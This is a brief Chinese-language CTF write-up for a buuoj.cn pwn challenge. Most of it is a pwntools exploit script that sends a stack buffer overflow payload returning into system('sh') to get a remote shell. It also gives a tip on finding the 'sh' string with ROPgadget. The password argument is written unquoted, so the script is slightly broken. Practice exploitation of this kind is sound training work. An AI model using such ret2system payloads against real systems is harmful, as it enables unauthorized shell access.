先点进去 cat flag 说了 在 1 log中
from pwn import*
r=remote('node3.buuoj.cn',26204)
sys=0x80486b9
sh=0x080482ea
r.sendlineafter("Please input admin password:",administrator)
r.sendlineafter("0.Exit\n:",1)
payload='a'*(0x48+4)+p32(sys)+p32(sh)
r.sendlineafter("Please input new log info:",payload)
r.sendlineafter("0.Exit\n:",4)
r.interactive()
这道题只给了 sys的地址, 那么 ‘bin/sh’ ‘sh’ 可能也是存在的;
手动查找一下其地址
命令ROPgadget --binary 文件 --string 'sh'